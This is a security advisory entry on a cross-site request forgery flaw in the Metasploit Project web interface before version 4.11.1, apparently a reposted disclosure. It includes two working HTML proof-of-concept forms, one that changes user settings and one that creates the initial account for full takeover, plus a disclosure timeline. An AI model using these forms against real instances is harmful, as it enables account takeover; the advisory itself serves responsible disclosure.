Metasploit Project Cross Site Request Forgery

2015-03-17T00:00:00
ID PACKETSTORM:130860
Type packetstorm
Reporter Mohamed A. Baset
Modified 2015-03-17T00:00:00

Description

                                        
                                            `# Exploit Title: Metasploit Project initial User Creation CSRF  
# Google Dork: N/A  
# Date: 14-2-2015  
# Exploit Author: Mohamed Abdelbaset Elnoby (@SymbianSyMoh)  
# Vendor Homepage: http://www.metasploit.com/  
# Software Link:  
http://www.rapid7.com/products/metasploit/editions-and-features.jsp  
# Version: Free/Pro < 4.11.1 (Update 2015021901)  
# Tested on: All OS  
# CVE : N/A  
  
Vulnerability:  
Cross Site Request Forgery - (CSRF)  
  
Info:  
http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)  
  
More Details:  
After doing some research, i have found that the anti csrf token  
"authenticity_token" value is not validated from the local server side  
which will result in a more csrf attack scenario around the whole local  
metasploit project.  
  
Affected URL(s)/PoC Code(s):  
-Change Local Metasploit Project User Settings  
<html>  
<body>  
<form action="https://127.0.0.1:3790/users/1" method="POST">  
<input type="hidden" name="utf8" value="✓" />  
<input type="hidden" name="_method" value="put" />  
<input type="hidden" name="authenticity_token" value="" />  
<input type="hidden" name="user[fullname]" value="Attacker" />  
<input type="hidden" name="user[email]" value="EMAIL" />  
<input type="hidden" name="user[company]" value="COMPANY" />  
<input type="hidden" name="user[time_zone]" value="Cairo" />  
<input type="hidden" name="commit" value="Save Settings" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
-Full Local Metasploit Project Account Takeover before setting up the first  
user settings  
<html>  
<body>  
<form action="https://127.0.0.1:3790/users" method="POST">  
<input type="hidden" name="utf8" value="✓" />  
<input type="hidden" name="authenticity_token" value="" />  
<input type="hidden" name="user[username]" value="Username" />  
<input type="hidden" name="user[password]" value="PASSWORD" />  
<input type="hidden" name="user[password_confirmation]"  
value="PASSWORD" />  
<input type="hidden" name="user[fullname]" value="FUll_Name" />  
<input type="hidden" name="user[email]" value="EMAIL" />  
<input type="hidden" name="user[company]" value="COMPANY" />  
<input type="hidden" name="user[time_zone]" value="Cairo" />  
<input type="hidden" name="commit" value="Create Account" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
  
More Details/Impact:  
-Change Local Metasploit Project User Settings  
-Full Local Metasploit Project Account Takeover before setting up the first  
user settings  
  
Report Timeline:  
[-] 14/02/2015: Reported to Rapid7 Security Team  
[-] 14/02/2015: Initial Reply from HD Moore acknowledging the vulnerability  
[-] 17/02/2015: Reply from "Eray Yilmaz" about the Operation and public  
disclosure rules  
[-] 20/02/2015: Reply from "Eray Yilmaz" about releasing a patch for the  
vulnerability in place, Fixed in Update 4.11.1 (Update 2015021901),  
https://community.rapid7.com/docs/DOC-3010  
[-] 16/03/2015: Public Disclosure  
  
Thanks  
  
--   
*Best Regards**,**,*  
  
  
*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist  
& Bug Bounty Hunter.  
LinkedIn  
<https://www.linkedin.com/in/symbiansymoh>Curriculum Vitae  
<http://goo.gl/cNrVpL>  
<https://www.linkedin.com/in/symbiansymoh>Facebook  
<https://fb.com/symbiansymoh>Twitter  
<https://twitter.com/symbiansymoh>  
`